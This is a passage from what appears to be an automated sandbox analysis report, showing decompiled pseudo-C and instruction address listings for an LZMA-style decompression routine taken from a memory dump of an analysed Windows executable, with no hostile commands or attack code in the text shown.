                                                                                                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        														__ecx =  *(__ebp - 0x10);
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        														__ebx = __ebx | 0x00000001;
                                                                                                                        														__eflags = __ebx;
                                                                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														L101:
                                                                                                                        														_t338 = __ebp - 0x48;
                                                                                                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        														__eflags =  *_t338;
                                                                                                                        														goto L102;
                                                                                                                        													} else {
                                                                                                                        														goto L99;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 4);
                                                                                                                        												__eax = __eax - __ebx;
                                                                                                                        												 *(__ebp - 0x40) = __ecx;
                                                                                                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        												goto L108;
                                                                                                                        											case 0x1a:
                                                                                                                        												L56:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x1a;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x68);
                                                                                                                        												__al =  *(__ebp - 0x5c);
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        												 *( *(__ebp - 0x68)) = __al;
                                                                                                                        												__ecx =  *(__ebp - 0x14);
                                                                                                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        												__eax = __ecx + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t192;
                                                                                                                        												goto L79;
                                                                                                                        											case 0x1b:
                                                                                                                        												L75:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x1b;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												__cl =  *(__eax + __edx);
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                                                                        												 *(__eax + __edx) = __cl;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t274;
                                                                                                                        												__eax =  *(__ebp - 0x68);
                                                                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												_t283 = __ebp - 0x64;
                                                                                                                        												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                        												__eflags =  *_t283;
                                                                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        												L79:
                                                                                                                        												 *(__ebp - 0x14) = __edx;
                                                                                                                        												goto L80;
                                                                                                                        											case 0x1c:
                                                                                                                        												while(1) {
                                                                                                                        													L123:
                                                                                                                        													__eflags =  *(__ebp - 0x64);
                                                                                                                        													if( *(__ebp - 0x64) == 0) {
                                                                                                                        														break;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x14);
                                                                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        														__eflags = __eax;
                                                                                                                        													}
                                                                                                                        													__edx =  *(__ebp - 8);
                                                                                                                        													__cl =  *(__eax + __edx);
                                                                                                                        													__eax =  *(__ebp - 0x14);
                                                                                                                        													 *(__ebp - 0x5c) = __cl;
                                                                                                                        													 *(__eax + __edx) = __cl;
                                                                                                                        													__eax = __eax + 1;
                                                                                                                        													__edx = 0;
                                                                                                                        													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        													__edx = _t414;
                                                                                                                        													__eax =  *(__ebp - 0x68);
                                                                                                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        													__eflags =  *(__ebp - 0x30);
                                                                                                                        													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        													 *(__ebp - 0x14) = _t414;
                                                                                                                        													if( *(__ebp - 0x30) > 0) {
                                                                                                                        														continue;
                                                                                                                        													} else {
                                                                                                                        														L80:
                                                                                                                        														 *(__ebp - 0x88) = 2;
                                                                                                                        														goto L1;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												 *(__ebp - 0x88) = 0x1c;
                                                                                                                        												goto L170;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									L171:
                                                                                                                        									_t544 = _t543 | 0xffffffff;
                                                                                                                        									goto L172;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L1;
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067ee
                                                                                                                        0x004067f2
                                                                                                                        0x004069a1
                                                                                                                        0x004069b7
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x004069c8
                                                                                                                        0x004069cf
                                                                                                                        0x004069d3
                                                                                                                        0x004069d3
                                                                                                                        0x004067fe
                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fbe
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x00000000
                                                                                                                        0x00405fcf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fd8
                                                                                                                        0x00405fdb
                                                                                                                        0x00405fde
                                                                                                                        0x00405fe2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fe8
                                                                                                                        0x00405feb
                                                                                                                        0x00405fed
                                                                                                                        0x00405fee
                                                                                                                        0x00405ff1
                                                                                                                        0x00405ff3
                                                                                                                        0x00405ff4
                                                                                                                        0x00405ff6
                                                                                                                        0x00405ff9
                                                                                                                        0x00405ffe
                                                                                                                        0x00406003
                                                                                                                        0x0040600c
                                                                                                                        0x0040601f
                                                                                                                        0x00406022
                                                                                                                        0x0040602e
                                                                                                                        0x00406056
                                                                                                                        0x00406058
                                                                                                                        0x00406066
                                                                                                                        0x00406066
                                                                                                                        0x0040606a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x0040605d
                                                                                                                        0x0040605e
                                                                                                                        0x0040605e
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x00406034
                                                                                                                        0x00406039
                                                                                                                        0x00406039
                                                                                                                        0x00406042
                                                                                                                        0x0040604a
                                                                                                                        0x0040604d
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406070
                                                                                                                        0x00406070
                                                                                                                        0x00406074
                                                                                                                        0x00406920
                                                                                                                        0x00000000
                                                                                                                        0x00406920
                                                                                                                        0x0040607d
                                                                                                                        0x0040608d
                                                                                                                        0x00406090
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406096
                                                                                                                        0x0040609a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040609c
                                                                                                                        0x004060a2
                                                                                                                        0x004060cc
                                                                                                                        0x004060d2
                                                                                                                        0x004060d9
                                                                                                                        0x00000000
                                                                                                                        0x004060d9
                                                                                                                        0x004060a8
                                                                                                                        0x004060ab
                                                                                                                        0x004060b0
                                                                                                                        0x004060b0
                                                                                                                        0x004060bb
                                                                                                                        0x004060c3
                                                                                                                        0x004060c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x004063aa
                                                                                                                        0x004063ad
                                                                                                                        0x004063b0
                                                                                                                        0x004063b3
                                                                                                                        0x004063b3
                                                                                                                        0x004063b6
                                                                                                                        0x004063ba
                                                                                                                        0x004063bc
                                                                                                                        0x00406394
                                                                                                                        0x00406394
                                                                                                                        0x0040639c
                                                                                                                        0x004063a1
                                                                                                                        0x004063a3
                                                                                                                        0x004063a5
                                                                                                                        0x004063a5
                                                                                                                        0x004063bf
                                                                                                                        0x004063c6
                                                                                                                        0x004063c9
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x00406658
                                                                                                                        0x00406658
                                                                                                                        0x0040665c
                                                                                                                        0x00406983
                                                                                                                        0x00000000
                                                                                                                        0x00406983
                                                                                                                        0x00406662
                                                                                                                        0x00406665
                                                                                                                        0x00406668
                                                                                                                        0x0040666c
                                                                                                                        0x0040666f
                                                                                                                        0x00406675
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x0040667a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406428
                                                                                                                        0x00406428
                                                                                                                        0x0040642b
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00406767
                                                                                                                        0x0040676b
                                                                                                                        0x0040678d
                                                                                                                        0x00406790
                                                                                                                        0x0040679a
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040676d
                                                                                                                        0x00406770
                                                                                                                        0x00406774
                                                                                                                        0x00406777
                                                                                                                        0x00406777
                                                                                                                        0x0040677a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00000000
                                                                                                                        0x0040685b
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                        • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                                        • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                        • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004064EE() {
                                                                                                                        				unsigned short _t531;
                                                                                                                        				signed int _t532;
                                                                                                                        				void _t533;
                                                                                                                        				signed int _t534;
                                                                                                                        				signed int _t535;
                                                                                                                        				signed int _t565;
                                                                                                                        				signed int _t568;
                                                                                                                        				signed int _t589;
                                                                                                                        				signed int* _t606;
                                                                                                                        				void* _t613;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                                                                        						 *(_t613 - 0x84) = 0xb;
                                                                                                                        						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                        						goto L132;
                                                                                                                        					} else {
                                                                                                                        						__eax =  *(__ebp - 0x28);
                                                                                                                        						L88:
                                                                                                                        						 *(__ebp - 0x2c) = __eax;
                                                                                                                        						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        						L89:
                                                                                                                        						__eax =  *(__ebp - 4);
                                                                                                                        						 *(__ebp - 0x80) = 0x15;
                                                                                                                        						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        						L69:
                                                                                                                        						 *(__ebp - 0x84) = 0x12;
                                                                                                                        						while(1) {
                                                                                                                        							L132:
                                                                                                                        							 *(_t613 - 0x54) = _t606;
                                                                                                                        							while(1) {
                                                                                                                        								L133:
                                                                                                                        								_t531 =  *_t606;
                                                                                                                        								_t589 = _t531 & 0x0000ffff;
                                                                                                                        								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                        								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                        									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                        									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                        									 *(_t613 - 0x40) = 1;
                                                                                                                        									_t532 = _t531 - (_t531 >> 5);
                                                                                                                        									 *_t606 = _t532;
                                                                                                                        								} else {
                                                                                                                        									 *(_t613 - 0x10) = _t565;
                                                                                                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                        								}
                                                                                                                        								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                        									goto L139;
                                                                                                                        								}
                                                                                                                        								L137:
                                                                                                                        								if( *(_t613 - 0x6c) == 0) {
                                                                                                                        									 *(_t613 - 0x88) = 5;
                                                                                                                        									L170:
                                                                                                                        									_t568 = 0x22;
                                                                                                                        									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                        									_t535 = 0;
                                                                                                                        									L172:
                                                                                                                        									return _t535;
                                                                                                                        								}
                                                                                                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                        								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        								L139:
                                                                                                                        								_t533 =  *(_t613 - 0x84);
                                                                                                                        								while(1) {
                                                                                                                        									 *(_t613 - 0x88) = _t533;
                                                                                                                        									while(1) {
                                                                                                                        										L1:
                                                                                                                        										_t534 =  *(_t613 - 0x88);
                                                                                                                        										if(_t534 > 0x1c) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
                                                                                                                        											case 0:
                                                                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        												_t534 =  *( *(_t613 - 0x70));
                                                                                                                        												if(_t534 > 0xe1) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												_t538 = _t534 & 0x000000ff;
                                                                                                                        												_push(0x2d);
                                                                                                                        												asm("cdq");
                                                                                                                        												_pop(_t570);
                                                                                                                        												_push(9);
                                                                                                                        												_pop(_t571);
                                                                                                                        												_t609 = _t538 / _t570;
                                                                                                                        												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                        												asm("cdq");
                                                                                                                        												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                        												 *(_t613 - 0x3c) = _t604;
                                                                                                                        												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                        												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                        												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                        												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                        													L10:
                                                                                                                        													if(_t612 == 0) {
                                                                                                                        														L12:
                                                                                                                        														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                        														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        														goto L15;
                                                                                                                        													} else {
                                                                                                                        														goto L11;
                                                                                                                        													}
                                                                                                                        													do {
                                                                                                                        														L11:
                                                                                                                        														_t612 = _t612 - 1;
                                                                                                                        														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                        													} while (_t612 != 0);
                                                                                                                        													goto L12;
                                                                                                                        												}
                                                                                                                        												if( *(_t613 - 4) != 0) {
                                                                                                                        													GlobalFree( *(_t613 - 4));
                                                                                                                        												}
                                                                                                                        												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        												 *(_t613 - 4) = _t534;
                                                                                                                        												if(_t534 == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												} else {
                                                                                                                        													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                        													goto L10;
                                                                                                                        												}
                                                                                                                        											case 1:
                                                                                                                        												L13:
                                                                                                                        												__eflags =  *(_t613 - 0x6c);
                                                                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                                                                        													 *(_t613 - 0x88) = 1;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        												_t45 = _t613 - 0x48;
                                                                                                                        												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                        												__eflags =  *_t45;
                                                                                                                        												L15:
                                                                                                                        												if( *(_t613 - 0x48) < 4) {
                                                                                                                        													goto L13;
                                                                                                                        												}
                                                                                                                        												_t546 =  *(_t613 - 0x40);
                                                                                                                        												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                        													L20:
                                                                                                                        													 *(_t613 - 0x48) = 5;
                                                                                                                        													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                        													goto L23;
                                                                                                                        												}
                                                                                                                        												 *(_t613 - 0x74) = _t546;
                                                                                                                        												if( *(_t613 - 8) != 0) {
                                                                                                                        													GlobalFree( *(_t613 - 8));
                                                                                                                        												}
                                                                                                                        												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                        												 *(_t613 - 8) = _t534;
                                                                                                                        												if(_t534 == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												} else {
                                                                                                                        													goto L20;
                                                                                                                        												}
                                                                                                                        											case 2:
                                                                                                                        												L24:
                                                                                                                        												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                        												 *(_t613 - 0x84) = 6;
                                                                                                                        												 *(_t613 - 0x4c) = _t553;
                                                                                                                        												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                        												L132:
                                                                                                                        												 *(_t613 - 0x54) = _t606;
                                                                                                                        												goto L133;
                                                                                                                        											case 3:
                                                                                                                        												L21:
                                                                                                                        												__eflags =  *(_t613 - 0x6c);
                                                                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                                                                        													 *(_t613 - 0x88) = 3;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        												_t67 = _t613 - 0x70;
                                                                                                                        												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        												__eflags =  *_t67;
                                                                                                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        												L23:
                                                                                                                        												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                        												if( *(_t613 - 0x48) != 0) {
                                                                                                                        													goto L21;
                                                                                                                        												}
                                                                                                                        												goto L24;
                                                                                                                        											case 4:
                                                                                                                        												L133:
                                                                                                                        												_t531 =  *_t606;
                                                                                                                        												_t589 = _t531 & 0x0000ffff;
                                                                                                                        												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                        												if( *(_t613 - 0xc) >= _t565) {
